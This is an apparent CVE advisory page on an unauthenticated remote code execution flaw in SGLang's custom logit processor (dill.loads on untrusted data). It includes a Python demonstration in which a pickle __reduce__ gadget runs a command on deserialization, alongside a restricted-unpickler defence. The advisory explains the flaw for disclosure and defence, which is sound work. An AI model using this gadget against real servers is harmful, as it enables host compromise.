CVE-2026-7304
Description
SGLang's multimodal generation runtime is vulnerable to unauthenticated remote code execution when the --enable-custom-logit-processor option is enabled, as Python objects loaded via dill.loads() are deserialized without validation.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
SGLang multimodal generation runtime deserializes unvalidated Python objects via dill.loads() when --enable-custom-logit-processor is enabled, allowing unauthenticated remote code execution.
Vulnerability
CVE-2026-7304 is an unauthenticated remote code execution vulnerability in SGLang's multimodal generation runtime. The bug resides in the custom logit processor feature, which deserializes Python objects using dill.loads() without any validation. This occurs when the --enable-custom-logit-processor option is enabled, which is off by default but recommended in SGLang's documentation for serving DeepSeek-R1 and GLM-4 [1]. Affected versions are SGLang v0.4.1.post7 and later [1].
Exploitation
An unauthenticated attacker needs only network access to the generation endpoint and a server started with the --enable-custom-logit-processor flag. The attacker crafts a malicious serialized Python object (with dill, or with the standard pickle module whose wire format dill extends) whose deserialization invokes an attacker-chosen callable, for example os.system, with attacker-chosen arguments. Sending this payload to the exposed generation endpoint causes the server to call dill.loads() on the untrusted bytes, which executes the embedded command [1].
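The following is an added illustration written for this page; it is not SGLang's code and not the exploit from the cited advisory. It shows the mechanism the paragraph describes: a pickle stream whose reduce hook makes the unpickler call subprocess.check_output, so that merely deserializing the bytes runs a command. Standard-library pickle stands in for dill.loads() (assumption: dill's Unpickler is a subclass of pickle's, so the same gadget fires under either). MaliciousProcessor, RestrictedUnpickler and the allowlist contents are hypothetical names chosen for the example.

```python
import io
import pickle
import subprocess
import sys


class MaliciousProcessor:
    """Constructed payload object (hypothetical, not an SGLang class).

    The unpickler honours __reduce__ as "call this callable with these args
    and use the result as the object", which is the whole RCE primitive.
    """

    def __reduce__(self):
        # On loads() the unpickler calls subprocess.check_output(args).
        # A real attacker would substitute os.system or similar.
        return (subprocess.check_output,
                ([sys.executable, "-c", "print('pwned')"],))


def build_payload() -> bytes:
    """Serialize the gadget; these bytes are what an attacker would send."""
    return pickle.dumps(MaliciousProcessor())


def vulnerable_loads(data: bytes):
    """What an unvalidated loads() on request data amounts to.

    Returns whatever the embedded callable returned, proving it executed.
    """
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Hypothetical hardened loader: only plain data containers may be
    referenced by name. Any GLOBAL opcode naming something else (subprocess,
    os, builtins.eval, ...) is refused before the callable can run."""

    ALLOWED = {
        ("builtins", "list"), ("builtins", "dict"), ("builtins", "set"),
        ("builtins", "tuple"), ("builtins", "frozenset"),
    }

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def safe_loads(data: bytes):
    """Deserialize with the allowlist; raises on the gadget above."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def demo() -> dict:
    """Run the payload through both loaders and report what happened."""
    payload = build_payload()
    command_output = vulnerable_loads(payload)  # the command actually runs
    try:
        safe_loads(payload)
        gadget_blocked = False
    except pickle.UnpicklingError:
        gadget_blocked = True
    # A benign, data-only pickle still round-trips through the restricted loader.
    benign = safe_loads(pickle.dumps({"temperature": [0.7, 0.9]}))
    return {
        "command_output": command_output,
        "gadget_blocked": gadget_blocked,
        "benign_roundtrip": benign,
    }


if __name__ == "__main__":
    print(demo())
```

The allowlist refuses the gadget, but note what it cannot do: a custom logit processor is by definition a callable, and no find_class allowlist can admit user-supplied code safely. That is why an unpickle-based design has no drop-in hardening and the practical mitigation is to keep the feature disabled.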
Impact
Successful exploitation yields full remote code execution on the host running SGLang with the privileges of the SGLang process. This leads to complete compromise of confidentiality, integrity, and availability of the server and any data it handles. The CVSS v3.1 score is 9.8 (Critical) [1].
Mitigation
As of the publication date (2026-05-18), no official patch is available. The vendor did not respond during coordinated disclosure with CERT/CC (case VU#777338) [1]. Until a fix is released, the only mitigation is to leave the --enable-custom-logit-processor flag disabled (its default). If the feature is required, restrict network access to the generation endpoint to trusted hosts only [1].
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- (no CPE identifiers recorded)
Patches
No patches discovered yet.
References
[1] antiproof.ai/blog/three-rces-in-sglang/
[2] github.com/sgl-project/sglang/tree/main/python/sglang